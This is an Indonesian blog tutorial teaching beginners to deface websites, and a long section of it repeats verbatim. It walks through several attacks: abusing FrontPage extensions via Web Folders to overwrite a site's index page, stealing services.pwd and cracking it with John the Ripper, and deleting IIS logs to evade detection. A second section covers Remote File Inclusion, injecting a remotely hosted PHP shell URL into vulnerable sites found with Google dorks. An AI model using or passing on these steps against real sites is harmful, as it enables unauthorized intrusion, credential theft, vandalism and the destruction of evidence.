GUNAKANLAH DENGAN BIJAK!!!!. Saat ini mendeface website bukan suatu pekerjaan yang sulit. Bahkan anak kecil pun jika diberitahu cara mendeface, maka dia dapat mendeface ratusan situs!!! Deface adalah kegiatan mengubah halaman website orang lain tanpa sepengetahuan orang tersebut, pastinya ini adalah kejahatan dunia cyber. Deface terkenal juga dengan sebutan cybergrafitti yaitu corat-coret website tertentu. Deface dilakukan dengan memanfaatkan kelemahan dari website tersebut. Nah bagi sobat blogger yang penasaran, gimana sih caranya? Ok cekidot cara mudah untuk para newbie (termasuk gw tentunya yang newbie hehehehe...) ^.^
Cara Mudah DEFACE Website
Dan sesungguhnya terdapat banyak cara untuk mendeface suatu situs !! Namun disini saya akan membahas mengenai cara yang paling mudah, kebanyakan teknik yang digunakan oleh para hacker, termasuk di Brazil, Arah, USA dan UK serta negara-negara lainnya. Dan ini bukan sekedar “joke” namun bukti dari konsep. Cukup banyak situs besar yang telah dihack karena bug ini termasuk situs NASA !!!
Bug…………..
Pertama kali berbicara mengenai bug. OK, Bugnya ada pada ekstensi Frontpage yang ditemukan pada tahun 2000 namun masih aktif hingga hari ini !!! Ekstensi Frontpage menjadi ‘enabled’ pada Webserver yang barlainan sehingga admin dapat mengupload file ke server tersebut dari komputer manapun pada intranet! Saat ini ekstensi Frontpage menjadi ‘enabled’ pada berbagai server yang selanjutnya didefinisikan menjadi 3 file pada server IIS:
www.site.com/_vti_bin/shtml.dll
www.site.com/_vti_bin/_vti_adm/admin.dll
www.site.com/_vti_bin/_vti_aut/author.dll
Dan jika server tersebut bukan merupakan IIS tapi server jenis lain, seperti Apache maka file tersebut mempunyai ekstensi file .exe misalnya author.exe Scanning Sekarang pertanyaannya adalah bagaimana menemukan situs yang vulnerable! Atau situs yang memiliki ekstensi Frontpage yang ‘enabled’! OK, sangat mudah membuad suatu program yang dapat mencari situs yang memiliki author.dll atau author.exe dan jika file tersebut ditemukan maka server tersebut dikategorikan ‘vulnerable’. Baiklah, sebelumnya saya sudah membuat program scanner untuk keperluan pribadi tapi saat ini dapat didownload untuk publik. Anda dapat mendownload tool ini yang saya beri nama “Universal Bug Scanner” dan anda memerlukan Visual Studio yang terinstall pada computer anda agar dapat menggunakan tool ini. OK?
Selanjutnya, kumpulkan daftar situs dengan menggunakan google/alltheweb/vivisimo/britanica (atau search engine lainnya, meski saya rekomendasikan agar menggunakan www.alltheweb.com, karena banyak sekali situs yang vulnerable disini J jika dibandingkan dengan google yang mengutamakan situs-situs yang tergolong secure seperti “asp” , “iis” atau sesuatu yang seperti itu! Kumpulkan daftar situs dan simpanlah dalam suatu file.
Sekarang bukalah Universal Bug Scanner, upload file tersebut dan mulailah proses scanning untuk mencari situs-situs yang vulnerable. Dan jika anda ingin menjadi seorang elite hacker, maka sebaiknya anda menggunakan program scanner buatan anda sendiri OK? Yeah, hal ini tidak hanya meningkatkan pengetahuan tentang pemrograman anda tapi mendorong anda untuk mengembangkan program scanner yang lebih powerful meliputi jenis web server, SMTP dan berbagai jenis bug !!!
Deface!!!
1) Nah, sekarang bukalah window My Computer
2) dan double click “Web Folders”!!!
3) double click lagi “Add web folder” dan akan diminta nama situs.
4) Ketiklah nama situs yang tergolong vulnerable
5) click next
6) Setelah request diterima, click Finished.
Tapi jika dikatakan bahwa host not found, cobalah lagi. Dan jika anda mendapatkan warning yang sama, wah,
pasti ada masalah pada sistem windows anda. Install ulang, buddy J dan setelah suatu web folder dengan nama
situs yang vulnerable dibuat
7) Double click dan browse file-file target selayaknya anda menggunakan komputer sendiri!!!
Rename index.html dalam server tersebut dengan nama lain, misalnya indexold.html
9) Copylah index.html karya anda sendiri ke sistem korban. Hmm.. anda sebenarnya dapat mengcopy, menghapus atau menambahkan sesuatu ke server korban dengan menggunakan web folder sederhana yang anda buat saat ini dan memperlakukannya selayaknya komputer anda sendiri!!! Keren bukan?
Cracking Password
Oopss… tapi tidak seluruh admin termasuk bodoh yang membiarkan server mereka begitu saja di hacked. Dari 6 diantara 10 admin (sepanjang serangan yang saya lakukan) memproteksi ekstensi frontpage mereka dengan Password. Jadi saat anda melakukan double click, web folder tersebut akan meminta suatu username dan password!!! Baiklah, jika anda tidak ingin mengcrack password maka cobalah cari situs lain saja. Tapi jika ingin meneruskan hacking web tersebut, maka perlu diperhatikan langkah-langkah berikut ini:
Password untuk ekstensi front page tersimpan dalam file services.pwd dengan format berikut:
username:password
Baiklah, password tersebut tersimpan dalam form yang terenkripsi menggunakan Algorithma DES
(jangan khawatir tutorial mengenai masalah enkripsi-dekripsi/kriptografi akan saya jelaskan nanti J. Ok, sekarang sama dengan algoritma yang digunakan untuk mengenkripsi password pada sistem operasi Linux.
Jadi kita dapat menggunakan linux passwd cracker untuk mengcrack file services.pwd. Arahkan browser anda ke situs www.openwall.com dan downloadlah John the Ripper cracker. Sekarang downloadlah file
services.pwd dari mesin korban dan ubahlah file services.pwd sebagaimana file passwd unix dengan tujuh field sebagai gantir dari dua yang memberikan data acak seperti:
username:password:123:123:something:/home/couldbe_myname:/bin/bash
Ok begitu kita telah memisahkan tujuh field yang terpisah dengan “:” sekarang gunakan JTR cracker untuk mengcrack password sebagaimana jika kita mengcrack file passwd linux. Dan setelah itu kita akan mendapatkan password yang sesungguhnya, masukkan dalam web folder dan lakukan proses deface !!
Hei, tunggu dulu ada hal yang berbeda dan harus diperhatikan dalam proses hacking ini!!
Menyembunyikan identitas anda saat hacking adalah seni tersendiri. Anda dapat menuliskan suatu script asp
yang akan menghapus log dan menguplad file asp tersebut ke sistem korban dan bukalah file yang sama dari
browser anda. File log untuk IIS (win2000 server) biasanya tersimpan dalam folder
C:\\\\\\\\WINNT\\\\\\\\SYSTEM32\\\\\\\\LOGFILES\\\\\\\\W3SVC32, dan jika anda tidak mengetahui format file log ini maka saya rekomendasikan untuk menghapus semua data dalam file ini. Dan jangan khawatir ada artikel yang membahas cara menghapus log, lengkap dengan source code akan segera kami rilis. Jadi saat ini saya menganggap anda melakukan deface web site melalui warung internet J keren khan!!! Ingat, sebaiknya jangan melakukan hal ini dari komputer teman anda yang akan menyeretnya dalam kesulitan yang anda timbulkan. Dan jika anda melakukannya dari komputer di rumah anda sebaiknya jangan menghapus segala
sesuatu dalam sistem tersebut, agar anda tidak dijerat oleh Undang-Undang Cyber yang berlaku.
Hmmm… deface pertama anda? Anda benar-benar beruntung. Tapi ingat hal ini tidak akan pernah menjadikan anda sebagai seorang elite hacker melainkan lamer (pengacau). Artikel ini hanya menjelaskan teknik populer yang digunakan untuk mendeface. Anda akan terkejut saat mengetahui ada banyak teknik deface yang ada di internet.
Semoga bermanfaat.. Sekali lagi GUNAKANLAH DENGAN BIJAK
Cara Mudah DEFACE Website
- Buka www.milw0rm.com
- Klik Search
- Ketik RFI (Remote File Inclusion)
- Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
- Buka Google, dan liat Advisor yang kita pilih tersebut
- * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut,
- * Jika tidak gunakanlah Judul dari Exploit tersebut
- Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
- Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
- Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
- Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
- Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
- Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
- Ganti command exploit setelah tanda '='[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
- Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
- Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <-- untuk file | drwxrwxrwx / drw-rw-rw <-- untuk direktory
- Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama manadocoding dikibarkan disana...
- Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi.....
Dan sesungguhnya terdapat banyak cara untuk mendeface suatu situs !! Namun disini saya akan membahas mengenai cara yang paling mudah, kebanyakan teknik yang digunakan oleh para hacker, termasuk di Brazil, Arah, USA dan UK serta negara-negara lainnya. Dan ini bukan sekedar “joke” namun bukti dari konsep. Cukup banyak situs besar yang telah dihack karena bug ini termasuk situs NASA !!!
Bug…………..
Pertama kali berbicara mengenai bug. OK, Bugnya ada pada ekstensi Frontpage yang ditemukan pada tahun 2000 namun masih aktif hingga hari ini !!! Ekstensi Frontpage menjadi ‘enabled’ pada Webserver yang barlainan sehingga admin dapat mengupload file ke server tersebut dari komputer manapun pada intranet! Saat ini ekstensi Frontpage menjadi ‘enabled’ pada berbagai server yang selanjutnya didefinisikan menjadi 3 file pada server IIS:
www.site.com/_vti_bin/shtml.dll
www.site.com/_vti_bin/_vti_adm/admin.dll
www.site.com/_vti_bin/_vti_aut/author.dll
Dan jika server tersebut bukan merupakan IIS tapi server jenis lain, seperti Apache maka file tersebut mempunyai ekstensi file .exe misalnya author.exe Scanning Sekarang pertanyaannya adalah bagaimana menemukan situs yang vulnerable! Atau situs yang memiliki ekstensi Frontpage yang ‘enabled’! OK, sangat mudah membuad suatu program yang dapat mencari situs yang memiliki author.dll atau author.exe dan jika file tersebut ditemukan maka server tersebut dikategorikan ‘vulnerable’. Baiklah, sebelumnya saya sudah membuat program scanner untuk keperluan pribadi tapi saat ini dapat didownload untuk publik. Anda dapat mendownload tool ini yang saya beri nama “Universal Bug Scanner” dan anda memerlukan Visual Studio yang terinstall pada computer anda agar dapat menggunakan tool ini. OK?
Selanjutnya, kumpulkan daftar situs dengan menggunakan google/alltheweb/vivisimo/britanica (atau search engine lainnya, meski saya rekomendasikan agar menggunakan www.alltheweb.com, karena banyak sekali situs yang vulnerable disini J jika dibandingkan dengan google yang mengutamakan situs-situs yang tergolong secure seperti “asp” , “iis” atau sesuatu yang seperti itu! Kumpulkan daftar situs dan simpanlah dalam suatu file.
Sekarang bukalah Universal Bug Scanner, upload file tersebut dan mulailah proses scanning untuk mencari situs-situs yang vulnerable. Dan jika anda ingin menjadi seorang elite hacker, maka sebaiknya anda menggunakan program scanner buatan anda sendiri OK? Yeah, hal ini tidak hanya meningkatkan pengetahuan tentang pemrograman anda tapi mendorong anda untuk mengembangkan program scanner yang lebih powerful meliputi jenis web server, SMTP dan berbagai jenis bug !!!
Deface!!!
1) Nah, sekarang bukalah window My Computer
2) dan double click “Web Folders”!!!
3) double click lagi “Add web folder” dan akan diminta nama situs.
4) Ketiklah nama situs yang tergolong vulnerable
5) click next
6) Setelah request diterima, click Finished.
Tapi jika dikatakan bahwa host not found, cobalah lagi. Dan jika anda mendapatkan warning yang sama, wah,
pasti ada masalah pada sistem windows anda. Install ulang, buddy J dan setelah suatu web folder dengan nama
situs yang vulnerable dibuat
7) Double click dan browse file-file target selayaknya anda menggunakan komputer sendiri!!!
Rename index.html dalam server tersebut dengan nama lain, misalnya indexold.html
9) Copylah index.html karya anda sendiri ke sistem korban. Hmm.. anda sebenarnya dapat mengcopy, menghapus atau menambahkan sesuatu ke server korban dengan menggunakan web folder sederhana yang anda buat saat ini dan memperlakukannya selayaknya komputer anda sendiri!!! Keren bukan?
Cracking Password
Oopss… tapi tidak seluruh admin termasuk bodoh yang membiarkan server mereka begitu saja di hacked. Dari 6 diantara 10 admin (sepanjang serangan yang saya lakukan) memproteksi ekstensi frontpage mereka dengan Password. Jadi saat anda melakukan double click, web folder tersebut akan meminta suatu username dan password!!! Baiklah, jika anda tidak ingin mengcrack password maka cobalah cari situs lain saja. Tapi jika ingin meneruskan hacking web tersebut, maka perlu diperhatikan langkah-langkah berikut ini:
Password untuk ekstensi front page tersimpan dalam file services.pwd dengan format berikut:
username:password
Baiklah, password tersebut tersimpan dalam form yang terenkripsi menggunakan Algorithma DES
(jangan khawatir tutorial mengenai masalah enkripsi-dekripsi/kriptografi akan saya jelaskan nanti J. Ok, sekarang sama dengan algoritma yang digunakan untuk mengenkripsi password pada sistem operasi Linux.
Jadi kita dapat menggunakan linux passwd cracker untuk mengcrack file services.pwd. Arahkan browser anda ke situs www.openwall.com dan downloadlah John the Ripper cracker. Sekarang downloadlah file
services.pwd dari mesin korban dan ubahlah file services.pwd sebagaimana file passwd unix dengan tujuh field sebagai gantir dari dua yang memberikan data acak seperti:
username:password:123:123:something:/home/couldbe_myname:/bin/bash
Ok begitu kita telah memisahkan tujuh field yang terpisah dengan “:” sekarang gunakan JTR cracker untuk mengcrack password sebagaimana jika kita mengcrack file passwd linux. Dan setelah itu kita akan mendapatkan password yang sesungguhnya, masukkan dalam web folder dan lakukan proses deface !!
Hei, tunggu dulu ada hal yang berbeda dan harus diperhatikan dalam proses hacking ini!!
Menyembunyikan identitas anda saat hacking adalah seni tersendiri. Anda dapat menuliskan suatu script asp
yang akan menghapus log dan menguplad file asp tersebut ke sistem korban dan bukalah file yang sama dari
browser anda. File log untuk IIS (win2000 server) biasanya tersimpan dalam folder
C:\\\\\\\\WINNT\\\\\\\\SYSTEM32\\\\\\\\LOGFILES\\\\\\\\W3SVC32, dan jika anda tidak mengetahui format file log ini maka saya rekomendasikan untuk menghapus semua data dalam file ini. Dan jangan khawatir ada artikel yang membahas cara menghapus log, lengkap dengan source code akan segera kami rilis. Jadi saat ini saya menganggap anda melakukan deface web site melalui warung internet J keren khan!!! Ingat, sebaiknya jangan melakukan hal ini dari komputer teman anda yang akan menyeretnya dalam kesulitan yang anda timbulkan. Dan jika anda melakukannya dari komputer di rumah anda sebaiknya jangan menghapus segala
sesuatu dalam sistem tersebut, agar anda tidak dijerat oleh Undang-Undang Cyber yang berlaku.
Hmmm… deface pertama anda? Anda benar-benar beruntung. Tapi ingat hal ini tidak akan pernah menjadikan anda sebagai seorang elite hacker melainkan lamer (pengacau). Artikel ini hanya menjelaskan teknik populer yang digunakan untuk mendeface. Anda akan terkejut saat mengetahui ada banyak teknik deface yang ada di internet.
Semoga bermanfaat.. Sekali lagi GUNAKANLAH DENGAN BIJAK